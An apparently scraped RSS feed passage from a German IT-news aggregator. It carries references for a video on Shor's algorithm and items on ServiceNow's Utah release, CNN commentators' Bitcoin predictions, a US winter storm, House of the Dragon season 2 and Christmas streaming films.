Shor’s algorithm, Wikipedia - https://ve42.co/ShorWiki

Euler’s totient function, Wikipedia - https://ve42.co/EulerWiki

Asfaw, A. (2020). Shor’s Algorithm Lecture Series, Qiskit Summer School - https://ve42.co/ShorYT

How Quantum Computers Break Encryption, minutephysics via YouTube - https://ve42.co/PQCmpyt

Breaking RSA Encryption - an Update on the State-of-the-Art, QuintessenceLabs - https://ve42.co/QuintessenceLabs

O'Gorman, J., & Campbell, E. T. (2017). Quantum computation with realistic magic-state factories. Physical Review A, 95(3), 032338. - https://ve42.co/OGorman2017 

Gidney, C., & Ekerå, M. (2021). How to factor 2048 bit RSA integers in 8 hours using 20 million noisy qubits. Quantum, 5, 433. - https://ve42.co/Gidney2021

2021 Quantum Threat Timeline Report, Global Risk Institute - https://ve42.co/QuantumRisk

The IBM Quantum Development Roadmap, IBM - https://ve42.co/IBMQC

Post-Quantum Cryptography, Computer Security Resource Center (NIST) - https://ve42.co/CSRCPQC

Alagic, G., et al. (2022). Status report on the third round of the NIST post-quantum cryptography standardization process. US Department of Commerce, NIST. - https://ve42.co/Alagic2022

Thijs, L. (2015). Lattice cryptography and lattice cryptanalysis - https://ve42.co/Thijs2015

▀▀▀
Special thanks to our Patreon supporters:
Tj Steyn, Meg Noah, Bernard McGee, KeyWestr, Elliot Miller, Jerome Barakos, M.D., Amadeo Bee, TTST, Balkrishna Heroor, Chris LaClair, John H. Austin, Jr., Eric Sexton, john kiehl, Anton Ragin, Diffbot, Gnare, Dave Kircher, Burt Humburg, Blake Byers, Evgeny Skvortsov, Meekay, Bill Linder, Paul Peijzel, Josh Hibschman, Mac Malkawi, Juan Benet, Ubiquity Ventures, Richard Sundvall, Lee Redden, Stephen Wilcox, Marinus Kuivenhoven, Michael Krugman, Cy 'kkm' K'Nelson, Sam Lutfi.

▀▀▀
Written by Casper Mebius & Derek Muller
Edited by Trenton Oliver
Filmed by Raquel Nuno
Animated by Ivy Tello & Mike Radjabov
Additional video/photos supplied by Getty Images & Pond5
Music from Epidemic Sound & Jonny Hyman
Produced by Derek Muller, Petr Lebedev, & Emily Zhang<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ServiceNow continues workflow platform expansion with Utah release]]></title>
<description><![CDATA[With its Utah release, ServiceNow is expanding the reach of its Now Platform for workflow automation into new areas, and enhancing its performance in others.



Since ServiceNow introduced role-based workspaces as part of its new user interface, Next Experience, in March 2022, coverage has grown ...]]></description>
<link>https://tsecurity.de/de/1831616/it-security-nachrichten/servicenow-continues-workflow-platform-expansion-with-utah-release/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1831616/it-security-nachrichten/servicenow-continues-workflow-platform-expansion-with-utah-release/</guid>
<pubDate>Wed, 22 Mar 2023 16:50:36 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section><p>With its Utah release, ServiceNow is expanding the reach of its Now Platform for workflow automation into new areas, and enhancing its performance in others.</p>



<p>Since ServiceNow introduced role-based workspaces as part of its new user interface, Next Experience, in March 2022, coverage has grown with each passing release. Utah’s additions include dedicated workspaces for security incident response and operational resilience to help workers concentrate on what needs to be done in moments of crisis. The former is an expansion of ServiceNow’s moves into supporting cybersecurity teams over the past year, and the latter, a broader tool for scripting responses to outages of all kinds.</p>



<p>There’s also a new enterprise architect workspace where ServiceNow stakes its claim in the crowded market for managing SaaS spend. This workspace is intended to help enterprises manage app portfolios to reduce redundancy and cost. Other additions are intended to help enterprises manage their physical workspaces too, offering facilities managers somewhere to track building leases, or to reorganize office spaces.</p>



<p>Some of the enhancements to Utah are cosmetic, like the Theme Builder, which enables enterprises to quickly customize the appearance of workflows built on the Now Platform without resorting to editing HTML Custom Style Sheets. Others changes go deeper, such as improving the platform’s built-in search engine so the most relevant result is presented first or second, rather than seventh or eighth, said Jon Sigler, ServiceNow’s SVP for Now Platform.</p>



<p>Other enhancements include new workflows for HR and team leaders to optimize workforce output, and manage health and safety incidents, the company said.</p>



<p>For CIOs, the challenge with this release will be getting past preconceptions that ServiceNow is an IT services management (ITSM) platform, said IDC’s group VP for cloud operations and devops, Stephen Elliot.</p>



<p>“CIOs, and particularly VPs of IT infrastructure operations, have a particular perspective about what ServiceNow does, and how they do it,” he said. “But if you look back over the past couple years, they obviously have these other capabilities that serve chief HR officers, customer experience owners, employee experience, and things like that.”</p>



<h2>Brace for Impact</h2>



<p>Indeed, the Now Platform has become so sprawling that ServiceNow is concerned customers may not be getting as much value from it as what they are paying for. A year ago, the company introduced a new app, <a href="https://www.cio.com/article/304747/what-is-servicenow-impact-an-app-to-keep-digital-transformations-on-track.html">ServiceNow Impact</a>, to act as an always-on customer success manager not just for CIOs but for other leaders within the enterprise responsible for workflows running on Now Platform. With the Utah release, it’s leaning in, enhancing Impact’s tools for helping executives monitor their ServiceNow instance, and adding a product adoption roadmap that recommends which applications to adopt next.</p>



<p>It’s also expanding the catalog of accelerators—automated how-to guides to adoption—with new recommendations on creating personalized dashboards of ServiceNow adoption for different members of the executive team, and on conducting ITSM maturity assessments.</p>



<p>The Impact app and its accelerators have access to data from an enterprise’s ServiceNow instance, so users can track progress toward deploying a particular service, said ServiceNow’s SVP and global head of product experience, Amy Lokey.</p>



<p>“You can see a real time report on your next steps in terms of getting the maximum value out of your instance, out of the software that you’ve licensed,” she said.</p>



<p>For IDC’s Elliot, Impact’s ability to personalize metrics depending on a user’s interests, whether in HR, ITSM, or field service management, is key. “It’s a pretty clever way of helping customers understand the value they’re receiving,” he said.</p>



<h2>No GPT</h2>



<p>One feature notable by its absence from ServiceNow’s Utah release is generative AI.</p>



<p>Other enterprise software vendors are talking up a storm about their plans to incorporate OpenAI’s generative AI bot, ChatGPT, or some variation of it, but in most cases they’re still just plans. Salesforce CEO Marc Benioff wants you to, “Get ready to be wowed by Salesforce Einstein GPT!”—but <a href="https://www.cio.com/article/464018/salesforce-not-ready-to-unleash-generative-ai-on-its-customers.html">Salesforce isn’t ready to wow you yet</a>. And Microsoft, a big investor in Open AI and provider of the cloud infrastructure underlying its services, has invited a few companies to test <a href="https://www.computerworld.com/article/3691109/microsoft-365-copilot-chatbot-is-the-ai-based-future-of-work.html">Microsoft 365 Copilot</a>, a version of GPT for Word, Excel and Teams, but won’t even say when it will discuss a broader release.</p>



<p>ServiceNow isn’t ignoring the phenomenon, however, according to Sigler. “We understand it’s a tidal wave and that it’s a game-changer and it’s disruptive, and so we’re on it,” he said.</p>



<p>Vendors that rushed to incorporate generative AI functionality too soon, though, are unlikely to match customers’ expectations, which have been set by the free version of ChatGPT based on the GPT-3.5 model, and raised by recent demonstrations of the capabilities of GPT-4. OpenAI only opened up APIs for ChatGPT to enterprise developers at the start of March 2023—and the training data for that model cut off in September 2021.</p>



<p>“We look at it very closely, but this is an area that’s changing every day,” he said. “If you talk to companies that have introduced a generative AI feature, it’s three versions ago.”</p>



<p>Developers can now apply to Microsoft for limited access to its GPT-4 APIs beginning April 1. Sigler said ServiceNow customers will have to wait for functionality based on it, though.</p>



<p>“Microsoft plans on making that sort of thing available in November and we’re working closely with them, which would allow us to use the latest and greatest,” he said, adding that he may be able to say more in the coming months.</p>



<h2>AI in action</h2>



<p>GPT is no silver bullet however, said IDC’s Elliot, and different analytic models are required for different tasks. ServiceNow is well aware of that and has made a series of targeted acquisitions of AI technologies over the last three years, he said, adding: “They were very pragmatic about what they were buying those companies for.”</p>



<p>Those technologies are showing up in a number of areas in the Utah release. For example, there are improvements to ServiceNow’s natural language search function, intended to help users surface relevant documentation more quickly. AI also shows up in Document Intelligence, a more streamlined process for extracting information from documents.</p>



<p>It’s also being used to help optimize processes more widely across the enterprise. ServiceNow first applied its AI-based process optimization function to ITSM workflows but is now expanding it to encompass field service management and other areas. Although in October 2021, <a href="https://www.cio.com/article/189371/servicenow-celonis-team-up-to-power-process-automation.html">ServiceNow partnered with process mining specialist Celonis</a>, which also relies heavily on AI, to optimize processes across the wider enterprise, and is determined to build its own capabilities, too. </p>



<p>“We are 100% committed to process optimization being native to our platform, and this is the first release where I can really say, when it comes to our processes and how we handle them, no one will be better than us,” Sigler said.</p>
</div></div></div><category>Artificial Intelligence, Build Automation, CIO, Enterprise Architecture, IT Leadership</category>]]></content:encoded>
</item>
<item>
<title><![CDATA[CNN Political Commentator Predicts Bitcoin Rises to $103,000 in 2023]]></title>
<description><![CDATA["Cryptocurrency went through a transformation in 2022," writes CNN, noting that its peak price last year occurred on January 1 of 2022, at over $47,000:

Since then, the asset — along with other cryptocurrencies — has seen a steep fall in price, remaining well below $20,000 since early November.....]]></description>
<link>https://tsecurity.de/de/1752890/it-security-nachrichten/cnn-political-commentator-predicts-bitcoin-rises-to-103000-in-2023/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1752890/it-security-nachrichten/cnn-political-commentator-predicts-bitcoin-rises-to-103000-in-2023/</guid>
<pubDate>Sun, 01 Jan 2023 20:46:02 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA["Cryptocurrency went through a transformation in 2022," writes CNN, noting that its peak price last year occurred on January 1 of 2022, at over $47,000:

Since then, the asset — along with other cryptocurrencies — has seen a steep fall in price, remaining well below $20,000 since early November.... [Current price: $16,585] 

 In the wake of the FTX collapse, Emily Parker rhetorically asked, "So who will save crypto now?" Whether the currency can be saved at all is a question that divides our prognosticators. [Political commentator] Alice Stewart is the most bullish on the future of bitcoin, predicting that its peak price in 2023 will be $103,000. 


[Legal analyst] Elliot Williams isn't too far behind her, guessing the asset will top out at $70,000. [Opinion contributors] Jill Filipovic and Allison Hope, however, don't anticipate a rise in price at all — speculating that its peak value next year will be just $12,000 and $13,000 respectively. "I know nothing about Bitcoin," admits Hope, "but this seems like a conservative gloom and doom figure." 

In their larger collection of predictions, two CNN opinion contributors expressed mild hopes for bitcoin Raul Reyes wrote that Bitcoin "seems like the steadiest investment in the volatile crypto world," before predicting its 2023 peak price would be about $29,400. 
And Frida Ghitis predicted that "Speculators will swarm in, and Bitcoin will spike up above $36,000 — before falling back to Earth again."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=CNN+Political+Commentator+Predicts+Bitcoin+Rises+to+%24103%2C000+in+2023%3A+https%3A%2F%2Fbit.ly%2F3WIW87J"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fslashdot.org%2Fstory%2F23%2F01%2F01%2F1842257%2Fcnn-political-commentator-predicts-bitcoin-rises-to-103000-in-2023%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://slashdot.org/story/23/01/01/1842257/cnn-political-commentator-predicts-bitcoin-rises-to-103000-in-2023?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Weihnachtschaos in den USA: Wintersturm Elliot sabotiert Reisepläne]]></title>
<description><![CDATA[Über 2.200 Flüge mussten in den Vereinigten Staaten storniert werden. In fünf Bundesstaaten gibt es bereits Notfallpläne. Präsident Biden bittet, den Sturm ernst zu nehmen

					
									$(document).ready(function() {
										onYouTubePlayerAPIReadyByID('https://i.ds.at/jwYv7g/rs:fill:150:0/pl...]]></description>
<link>https://tsecurity.de/de/1744822/it-nachrichten/weihnachtschaos-in-den-usa-wintersturm-elliot-sabotiert-reiseplaene/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1744822/it-nachrichten/weihnachtschaos-in-den-usa-wintersturm-elliot-sabotiert-reiseplaene/</guid>
<pubDate>Fri, 23 Dec 2022 14:02:19 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://i.ds.at/jwYv7g/rs:fill:150:0/plain/2022/12/23/schneesturmusa03.jpg">Über 2.200 Flüge mussten in den Vereinigten Staaten storniert werden. In fünf Bundesstaaten gibt es bereits Notfallpläne. Präsident Biden bittet, den Sturm ernst zu nehmen<div id="ytplayer_https://i.ds.at/jwYv7g/rs:fill:150:0/plain/2022/12/23/schneesturmusa03.jpg"></div>

					<script>
									$(document).ready(function() {
										onYouTubePlayerAPIReadyByID('https://i.ds.at/jwYv7g/rs:fill:150:0/plain/2022/12/23/schneesturmusa03.jpg');
									}); 
									</script>]]></content:encoded>
</item>
<item>
<title><![CDATA[House of the Dragon: Alle Infos zu Staffel 2]]></title>
<description><![CDATA[“House of the Dragon“ hat sich als würdiges Prequel zu “Game of Thrones“ erwiesen – mit jeder Menge knallharter Schlachten, politischem Drama, viel Blutvergießen, schockierenden Wendungen und fragwürdigen Familienbeziehungen.



Die erste Staffel endete mit Rhaenyra Targaryen, die bereit war, den...]]></description>
<link>https://tsecurity.de/de/1741421/it-nachrichten/house-of-the-dragon-alle-infos-zu-staffel-2/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1741421/it-nachrichten/house-of-the-dragon-alle-infos-zu-staffel-2/</guid>
<pubDate>Wed, 21 Dec 2022 10:32:29 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section><p>“House of the Dragon“ hat sich als würdiges Prequel zu “Game of Thrones“ erwiesen – mit jeder Menge knallharter Schlachten, politischem Drama, viel Blutvergießen, schockierenden Wendungen und fragwürdigen Familienbeziehungen.</p>



<p>Die erste Staffel endete mit Rhaenyra Targaryen, die bereit war, den Hightowers die Hölle heiß zu machen. Aber was kommt als Nächstes? Wir haben alles zusammengetragen, was wir über die zweite Staffel der Serie wissen: Wann “House of the Dragon“ zurückkehren wird, welche Darsteller wieder dabei sein werden und welche Handlungsstränge im Zentrum stehen werden.</p>



<h2>Wann startet die zweite Staffel?</h2>



<p>HBO soll Anfang nächsten Jahres mit den Dreharbeiten zu Staffel 2 beginnen, ein offizielles Veröffentlichungsdatum gibt es jedoch noch nicht. Der Chef von HBO Max, Casey Bloys, sagte jedoch gegenüber <a href="https://r.srvtrck.com/v1/redirect?api_key=cc86ea3a04806258ca5dfd8a1fdab564&amp;type=url&amp;site_id=258fdff975614989a5989d6db151206a&amp;yk_tag=6-1-1440426-1-0-0&amp;url=https://www.vulture.com/2022/10/hbo-dragon-bet-paid-off.html" data-type="URL" data-id="https://www.vulture.com/2022/10/hbo-dragon-bet-paid-off.html" target="_blank" rel="nofollow">Vulture</a>, dass der Start im Jahr 2024 wahrscheinlich sei.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img src="https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon-rhaynera.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Rhaenyra Targaryen" class="wp-image-1433594" srcset="https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon-rhaynera.jpg?quality=50&amp;strip=all 1600w, https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon-rhaynera.jpg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon-rhaynera.jpg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon-rhaynera.jpg?resize=1200%2C675&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon-rhaynera.jpg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon-rhaynera.jpg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon-rhaynera.jpg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1200" height="675" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"></figure><p class="imageCredit">Warner Bros.</p></div>



<h2>Wie viele Episoden hat die zweite Staffel?</h2>



<p>George R.R. Martin hat <a href="https://r.srvtrck.com/v1/redirect?api_key=cc86ea3a04806258ca5dfd8a1fdab564&amp;type=url&amp;site_id=258fdff975614989a5989d6db151206a&amp;yk_tag=6-1-1440426-1-0-0&amp;url=https://georgerrmartin.com/notablog/2022/10/11/random-musings/" data-type="URL" data-id="https://georgerrmartin.com/notablog/2022/10/11/random-musings/" target="_blank" rel="nofollow">in seinem Blog</a> bestätigt, dass die nächste Staffel “zehn Stunden“ umfassen wird. Das lässt darauf schließen, dass die zweite Staffel wie schon Staffel eins zehn Episoden haben wird.</p>



<h2>Besetzung und Crew: Wer könnte zurückkehren?</h2>



<p>Auch wenn die offizielle Besetzungsliste für Staffel 2 noch nicht bestätigt wurde, erwarten wir, dass die folgenden Charaktere zurückkehren werden:</p>



<ul><li>Olivia Cooke als Alicent Hightower</li><li>Emma D’Arcy als Rhaenyra Targaryen</li><li>Matt Smith als Daemon Targaryen</li><li>Rhys Ifans als Otto Hightower</li><li>Eve Best als Prinzessin Rhaenys Targaryen</li><li>Steve Toussaint als Corlys Velaryon</li><li>Fabien Frankel als Criston Cole</li><li>Harry Collett als Jacaerys Velaryon</li><li>Tom Glynn-Carney als Aegon Targaryen</li><li>Ewan Mitchell als Aemond Targaryen</li><li>Bethany Antonia als Baela Targaryen</li><li>Phoebe Campbell als Rhaena Targaryen</li><li>Phia Saban als Helaena Targaryen</li><li>Matthew Needham als Larys Strong</li><li>Jefferson Hall als Jason Lannister und Tyland Lannister</li><li>Sonoya Mizuno als Mysaria</li></ul><div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon_1.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Alicent y Otto Hightower en La Casa del Dragón" class="wp-image-1436330" srcset="https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon_1.jpg?quality=50&amp;strip=all 1600w, https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon_1.jpg?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon_1.jpg?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon_1.jpg?resize=1200%2C675&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon_1.jpg?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon_1.jpg?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon_1.jpg?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1200" height="675" sizes="(max-width: 1200px) 100vw, 1200px"></figure><p class="imageCredit">Warner Bros.</p></div>



<p>Es ist unwahrscheinlich, dass wir Viserys I. (gespielt von Paddy Considine) wiedersehen werden – dasselbe gilt für Lucerys Velaryon (gespielt von Elliot Grihault). Wir erwarten, dass in der zweiten Staffel eine ganze Reihe neuer Charaktere eingeführt werden – vor allem aus anderen Häusern, die bisher noch nicht zu Wort gekommen sind, wie zum Beispiel die Starks.</p>



<p>Miguel Sapochnik, der Showrunner der ersten Staffel, hat sich von der Serie zurückgezogen. Die Nachfolge übernehmen Ryan Condal, der Co-Regisseur der ersten Staffel, und Alan Taylor, der bei einigen Episoden der ersten beiden Staffeln von “Game of Thrones“ Regie führte. Es wird erwartet, dass der Schöpfer der Buchreihe – George R.R. Martin – als ausführender Produzent zurückkehren wird.</p>



<h2>Was ist die Handlung von House of the Dragon Staffel 2?</h2>



<p>Die zweite Staffel wird mit dem Beginn des Targaryen-Bürgerkriegs beginnen, der auch als “Tanz der Drachen“ bekannt ist. Westeros wird durch zwei Thronansprüche gespalten: den von König Aegon II. Targaryen, der den Thron bestieg, nachdem seine Mutter Alicent ihren verstorbenen Mann angeblich sagen hörte, er wolle seinen Sohn zum Erben machen.</p>



<p>Die zweite stammt von Königin Rhaenyra I. Targaryen – der ursprünglichen Wahl von Viserys als seine erstgeborene Tochter. Sie glaubt, dass die Hightowers den Thron gestohlen haben und sieht aus diesem Grund die Krönung Aegons als Verrat.</p>



<p>Zunächst schien es, als sei Rhaenyra bereit, eine friedliche Lösung für diesen Konflikt zu finden. Doch das wird sich nach dem grausamen Tod ihres Sohnes Lucerys Velaryon, der von Prinz Aemonds Drachen Vhagar gefressen wurde, ändern. Es mag ein Unfall gewesen sein, aber in Anbetracht des bösen Blutes zwischen den beiden Jungen, wird es für andere jedoch nicht so aussehen. Es ist fast sicher, dass sich Rhaenyra brutal an Alicent und ihrer Familie rächen wird.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon_2.webp?w=1200" alt="Aemond Targaryen en La Casa del Dragón" class="wp-image-1436349" srcset="https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon_2.webp?quality=50&amp;strip=all 1600w, https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon_2.webp?resize=300%2C168&amp;quality=50&amp;strip=all 300w, https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon_2.webp?resize=768%2C432&amp;quality=50&amp;strip=all 768w, https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon_2.webp?resize=1200%2C675&amp;quality=50&amp;strip=all 1200w, https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon_2.webp?resize=1536%2C864&amp;quality=50&amp;strip=all 1536w, https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon_2.webp?resize=1240%2C697&amp;quality=50&amp;strip=all 1240w, https://b2c-contenthub.com/wp-content/uploads/2022/12/house-of-the-dragon_2.webp?resize=150%2C84&amp;quality=50&amp;strip=all 150w" width="1200" height="675" sizes="(max-width: 1200px) 100vw, 1200px"></figure><p class="imageCredit">Warner Bros.</p></div>



<p>Die ausführende Produzentin Sara Hess sagte gegenüber <a href="https://r.srvtrck.com/v1/redirect?api_key=cc86ea3a04806258ca5dfd8a1fdab564&amp;type=url&amp;site_id=258fdff975614989a5989d6db151206a&amp;yk_tag=6-1-1440426-1-0-0&amp;url=https://www.hollywoodreporter.com/tv/tv-news/house-of-the-dragon-matt-smith-daemon-targaryen-crush-1235242470/" data-type="URL" data-id="https://www.hollywoodreporter.com/tv/tv-news/house-of-the-dragon-matt-smith-daemon-targaryen-crush-1235242470/" target="_blank" rel="nofollow">The Hollywood Reporter</a>, dass die nächste Staffel auch die giftige Dynamik zwischen Rhaenyra und ihrem Ehemann (und, nicht zu vergessen, Onkel) Daemon beleuchten wird. Außerdem wird sich die Serie zwar weiterhin um die Geschichten von Alicent und Rhaenyra drehen, aber sie wird sich laut <a href="https://r.srvtrck.com/v1/redirect?api_key=cc86ea3a04806258ca5dfd8a1fdab564&amp;type=url&amp;site_id=258fdff975614989a5989d6db151206a&amp;yk_tag=6-1-1440426-1-0-0&amp;url=https://ew.com/tv/house-of-the-dragon-season-2-finale-opens-up-world/" data-type="URL" data-id="https://ew.com/tv/house-of-the-dragon-season-2-finale-opens-up-world/" target="_blank" rel="nofollow">EW</a> mehr zu einer Ensemble-Show entwickeln. Was den jungen König Aegon Targaryen II angeht, so <a href="https://r.srvtrck.com/v1/redirect?api_key=cc86ea3a04806258ca5dfd8a1fdab564&amp;type=url&amp;site_id=258fdff975614989a5989d6db151206a&amp;yk_tag=6-1-1440426-1-0-0&amp;url=https://www.thedigitalfix.com/game-of-thrones/aegon-targaryen-ii-havoc-house-of-the-dragon-season-2" data-type="URL" data-id="https://www.thedigitalfix.com/game-of-thrones/aegon-targaryen-ii-havoc-house-of-the-dragon-season-2" target="_blank" rel="nofollow">behauptet</a> der Schauspieler Tom Glynn-Carney, dass seine Figur in der zweiten Staffel “Verwüstung anrichten“ wird.</p>



<h2>Wird es mehr als zwei Staffeln von “House of the Dragon“ geben?</h2>



<p>Mit ziemlicher Sicherheit. <a href="https://r.srvtrck.com/v1/redirect?api_key=cc86ea3a04806258ca5dfd8a1fdab564&amp;type=url&amp;site_id=258fdff975614989a5989d6db151206a&amp;yk_tag=6-1-1440426-1-0-0&amp;url=https://www.thedigitalfix.com/game-of-thrones/aegon-targaryen-ii-havoc-house-of-the-dragon-season-2" data-type="URL" data-id="https://www.thedigitalfix.com/game-of-thrones/aegon-targaryen-ii-havoc-house-of-the-dragon-season-2" target="_blank" rel="nofollow">Variety</a> enthüllte, dass George R.R. Martin einen Fünfjahresvertrag mit HBO und HBO Max unterzeichnet hat, was bedeuten könnte, dass “House of the Dragon“ mindestens so lange laufen wird. Obwohl die Serie nur für eine zweite Staffel verlängert wurde, war sie eine der erfolgreichsten HBO-Serien, so dass wir überrascht wären, wenn sie abgesetzt würde.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img src="https://bilder.pcwelt.de/4314959_original.jpg?quality=50&amp;strip=all" alt='"House of the Dragon": HBO veröffentlicht ersten Teaser-Trailer zum GoT-Spin-Off' class="wp-image-1198914" loading="lazy"></figure><p class="imageCredit">HBO</p></div>



<h2>So können Sie “House of the Dragon“ streamen</h2>


<p class="cta wp-block wp-block-button"><a class="cta__btn" href="https://clk.tradedoubler.com/click?p=297463&amp;a=1849056&amp;epi=6-1-1440426-7-0-0&amp;url=https://www.sky.de/serien/house-of-the-dragon" target="_blank" rel="nofollow" data-vars-link-position="CTA Button">“House of the Dragon" jetzt bei Sky anschauen</a></p>


<p>In Deutschland können Sie alle zehn Episoden aus Staffel eins der HBO-Serie <a href="https://clk.tradedoubler.com/click?p=297463&amp;a=1849056&amp;epi=6-1-1440426-1-0-0&amp;url=https://www.sky.de/serien/house-of-the-dragon" data-type="URL" data-id="https://www.sky.de/serien/house-of-the-dragon" target="_blank" rel="nofollow">über Sky streamen</a>. Die zweite Staffel wird zum Start voraussichtlich auch über Sky bereitstehen. Im <a href="https://clk.tradedoubler.com/click?p=297463&amp;a=1849056&amp;epi=6-1-1440426-1-0-0&amp;url=https://www.sky.de/bestellung/pakete-produkte/sky-entertainment-plus-paket-165191" data-type="URL" data-id="https://www.sky.de/bestellung/pakete-produkte/sky-entertainment-plus-paket-165191" target="_blank" rel="nofollow">Entertainment Plus Paket</a> des Anbieters sind sowohl alle Sky-, HBO- als auch Netflix-Inhalte (im Basis-Abo) inklusive. Im Jahresabo schlägt das Paket mit 15 Euro monatlich zu Buche.</p>

<category>Streaming Media</category></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Die besten Weihnachtsfilme auf Netflix, Amazon Prime Video und Disney+]]></title>
<description><![CDATA[Bei den Streaming-Anbietern Amazon Prime Video, Netflix und Disney+ findet sich eine breite Auswahl an Weihnachtsfilmen aus unterschiedlichen Genres. Für Fans von Action und Spannung ist ebenso viel dabei wie für Romantiker oder den Nachwuchs. In den Bibliotheken der drei großen Streaming-Dienste...]]></description>
<link>https://tsecurity.de/de/1735557/it-nachrichten/die-besten-weihnachtsfilme-auf-netflix-amazon-prime-video-und-disney/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1735557/it-nachrichten/die-besten-weihnachtsfilme-auf-netflix-amazon-prime-video-und-disney/</guid>
<pubDate>Fri, 16 Dec 2022 10:47:38 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section><p>Bei den Streaming-Anbietern <a rel="nofollow" href="http://buy.geni.us/Proxy.ashx?TSID=319187&amp;GR_URL=https://www.amazon.de/gp/video/getstarted?ascsubtag=6-1-1436753-1-0-0" target="_blank">Amazon Prime Video</a>, <a rel="nofollow" href="https://r.srvtrck.com/v1/redirect?api_key=cc86ea3a04806258ca5dfd8a1fdab564&amp;type=url&amp;site_id=258fdff975614989a5989d6db151206a&amp;yk_tag=6-1-1436753-1-0-0&amp;url=https://www.netflix.com" target="_blank">Netflix </a>und <a rel="nofollow" href="https://ndt5.net/c/?si=14711&amp;li=1646436&amp;wi=344763&amp;ws=" target="_blank">Disney+</a> findet sich eine breite Auswahl an Weihnachtsfilmen aus unterschiedlichen Genres. Für Fans von Action und Spannung ist ebenso viel dabei wie für Romantiker oder den Nachwuchs. In den Bibliotheken der drei großen Streaming-Dienste tummeln sich insgesamt mehr als 60 Weihnachtsfilme. Wir stellen Ihnen die besten vor:</p>



<h2>Kevin allein zu Haus &amp; Kevin allein in New York (Disney+)</h2>


<p class="cta wp-block wp-block-button"><a class="cta__btn" href="https://ndt5.net/c/?si=14711&amp;li=1646436&amp;wi=344763&amp;ws=" target="_blank" rel="nofollow" data-vars-link-position="CTA Button">Auf Disney+ ansehen</a></p>


